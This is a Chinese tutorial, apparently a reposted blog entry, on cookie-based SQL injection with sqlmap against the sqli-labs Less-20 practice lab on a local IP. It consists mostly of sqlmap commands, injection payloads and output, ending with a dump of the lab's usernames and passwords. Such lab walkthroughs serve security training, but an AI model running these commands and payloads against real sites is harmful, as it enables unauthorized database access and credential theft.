Sqlmap2021 -- Cookie注入

Posted web安全工具库

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Sqlmap2021 -- Cookie注入相关的知识,希望对你有一定的参考价值。

喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。
----  网易云热评
一、检测Cookie注入
1、通过BurpSuite抓包,将封包内容保存到1.txt
GET /sqli/Less-20/index.php HTTP/1.1
Host: 192.168.139.129
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.139.129/sqli/Less-20/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uname=admin; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
Connection: close
2、判断是否存在注入
sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2
--cookie:指定参数
--level 2:等级2以上才会检测cookie注入
运行结果:
[16:44:49] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                                             
Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: uname (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uname=admin' AND 6679=6679 AND 'sdQh'='sdQh; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    Type: error-based
    Title: mysql >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=admin' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(6429=6429,1))),0x717a767a71),6429) AND 'whpT'='whpT; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 6802 FROM (SELECT(SLEEP(5)))pIcR) AND 'rFnD'='rFnD; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: uname=-4950' UNION ALL SELECT NULL,CONCAT(0x7162717171,0x4f62636a6e49426b5a415141657259517971566f6463496b714561576f4d58446459787146754d78,0x717a767a71),NULL-- -; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
---
[16:44:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[16:44:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'   
二、获取数据库
sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 --dbs
 
运行结果:
[16:57:57] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[16:57:57] [INFO] fetching database names
do you want to URL encode cookie values (implementation specific)? [Y/n]
[16:57:59] [WARNING] reflective value(s) found and filtering out
available databases [10]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] pikachu
[*] security
[*] sys
[*] www_dgdg_com
[*] www_zm_com
[16:57:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
三、获取表名
sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security --tables
 
运行结果:
[17:05:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[17:05:15] [INFO] fetching tables for database: 'security'
do you want to URL encode cookie values (implementation specific)? [Y/n]
[17:05:16] [WARNING] reflective value(s) found and filtering out
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+
[17:05:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
四、获取字段名
sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --columns
 
运行结果:
[17:07:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[17:07:37] [INFO] fetching columns for table 'users' in database 'security'
do you want to URL encode cookie values (implementation specific)? [Y/n]
[17:07:38] [WARNING] reflective value(s) found and filtering out
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[17:07:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'  
五、获取字段内容
sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"
 
运行结果:
[17:09:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[17:09:08] [INFO] fetching columns for table 'users' in database 'security'
[17:09:08] [INFO] fetching entries for table 'users' in database 'security'
do you want to URL encode cookie values (implementation specific)? [Y/n]
[17:09:09] [WARNING] reflective value(s) found and filtering out
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+
[17:09:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'                                              
[17:09:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
六、其他检测Cookie注入方法
1、检测是否存在注入
sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2
2、获取数据库名称
sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 --dbs
3、获取表名
sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security --tables
4、获取字段名
sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --columns
5、获取字段内容
sqlmap -u " http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"
禁止非法,后果自负
欢迎关注公众号:web安全工具库
欢迎关注视频号:之乎者也吧
 
 
 

以上是关于Sqlmap2021 -- Cookie注入的主要内容,如果未能解决你的问题,请参考以下文章

如何使用sqlmap注入一部分cookie

sqlmap的post注入加cookie

SQLMAP自动注入

sqlmap cookies站点的中转注入

sqlmap一跑就死,怎么注入

sqlmap命令